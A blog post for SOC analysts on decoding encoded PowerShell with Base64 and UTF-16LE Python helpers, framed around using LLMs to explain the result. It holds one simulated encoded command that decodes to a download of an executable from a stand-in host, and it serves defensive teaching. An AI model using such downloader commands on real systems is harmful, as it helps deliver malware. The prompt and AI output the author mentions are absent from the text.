Deobfuscation of PowerShell with LLMs

Hi all!

A huge barrier newer SOC analysts face today is not knowing what they don't know. PowerShell is perhaps one of the tools threat actors use most, and encoded PowerShell can seem daunting to analysts, especially given the huge blocks of encoded text it tends to produce. Despite their drawbacks, LLMs can greatly help analysts understand both the decoding process and what the PowerShell actually does.

As an example, here we have a simulated encoded command:

powershell.exe -EncodedCommand JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAG4AYQBtAGUALgBlAHgAZQAiADsAWwBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0AF0AOgA6AEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAApAA==

Just by looking at this command line, an analyst has no idea what the encoded command is doing. The traditional way of decoding it in most SOC environments would be as follows:

  1. Take the encoded portion of the command and paste it into CyberChef - https://gchq.github.io/CyberChef (or a similar decoding tool, but CyberChef is the one SOCs most commonly use).
  2. Hope there wasn't more complex encoding involved, and hopefully get plaintext back out by knowing (somehow) that the encoding used is Base64.
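
For anyone who would rather script those two steps than click through CyberChef, here is a minimal Python sketch. It assumes the value follows the standard -EncodedCommand convention (Base64 over UTF-16LE text), which is also why a plain Base64 decode shows a null byte after every character. The names decode_encoded_command and SAMPLE are made up for illustration and are not part of any library. Decoding this way only produces text; nothing is executed.

```python
import base64
import binascii

# The simulated command from this post, split into three chunks for readability.
SAMPLE = (
    "JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAG4AYQBtAGUA"
    "LgBlAHgAZQAiADsAWwBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcA"
    "ZQBiAGMAbABpAGUAbgB0AF0AOgA6AEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAApAA=="
)


def decode_encoded_command(encoded: str) -> str:
    """Decode the argument passed to powershell.exe -EncodedCommand.

    Assumption: the payload is Base64 over UTF-16LE text with no further
    layers (no XOR, no compression).
    """
    try:
        raw = base64.b64decode(encoded.strip(), validate=True)
    except binascii.Error as exc:
        raise ValueError("input is not valid Base64") from exc
    # Decoding as UTF-16LE replaces the manual "remove null bytes" step.
    return raw.decode("utf-16-le")


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE))
```

Run against the sample above, this should print the `$url` assignment followed by the `DownloadFile` call, with no separate null-byte cleanup needed.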

Have you already identified a few pain points for new analysts? For me, the main ones are:

  • How can we identify that we need to use Base64 decoding for this set of characters?
  • What follow-up options might we need to make the content readable (null byte removal and whitespace removal)?
  • What does the PowerShell contained inside the encoded value actually mean?
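
The first two questions can be roughly approximated in code. The sketch below is a heuristic only, not a definitive detector: it checks whether a string is limited to the Base64 alphabet with valid padding, then checks whether the decoded bytes have a zero in every second position, which is what ASCII text stored as UTF-16LE looks like. That same pattern is why the sample above is so full of "A" characters. The function names and the 0.8 threshold are assumptions chosen for illustration, and ordinary words made only of letters can produce false positives.

```python
import base64
import re

# Standard Base64 alphabet with up to two padding characters at the end.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_like_base64(text: str) -> bool:
    """Heuristic: long enough, length divisible by 4, Base64 alphabet only."""
    s = text.strip()
    return len(s) >= 16 and len(s) % 4 == 0 and BASE64_RE.fullmatch(s) is not None


def looks_like_utf16le(raw: bytes) -> bool:
    """Heuristic: most odd-indexed bytes are zero, as in UTF-16LE ASCII text."""
    if len(raw) < 2 or len(raw) % 2 != 0:
        return False
    high_bytes = raw[1::2]
    return high_bytes.count(0) / len(high_bytes) > 0.8  # threshold is a guess


def triage(text: str) -> str:
    """Suggest which decoding steps an analyst would likely need."""
    if not looks_like_base64(text):
        return "not base64"
    raw = base64.b64decode(text.strip())
    if looks_like_utf16le(raw):
        return "base64 + utf-16le"
    return "base64, unknown inner format"
```

A result of "base64, unknown inner format" is the cue that something beyond the tame case is going on and more digging is needed.
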
Keep in mind that this is the tamest type of encoded value you will typically encounter - there are far more complex PowerShell encoding techniques. We all know SOCs love efficiency, so how does OpenAI perform with this?

You can see the exact prompt I use below.


As you can see below, we get a very comprehensive analysis including alternate decoding methods, characteristics of the encoding pattern, full summaries of the PowerShell meaning - and more. 

I don't plan to post a huge amount of AI-related content, as I know we all hate that slop, but when it covers a pain point for newer analysts in particular, I feel the knowledge is great to have. Keep in mind that the analyst can now expand on this content in real time simply by asking the AI to elaborate on any element it presents, whereas in the past this amount of knowledge was typically gained only after hours of research.

That's all from me for today. I think I'll make my next post about some other types of encoded PowerShell, like XOR and GZIP-embedded encoding. Signing off.

Tony W
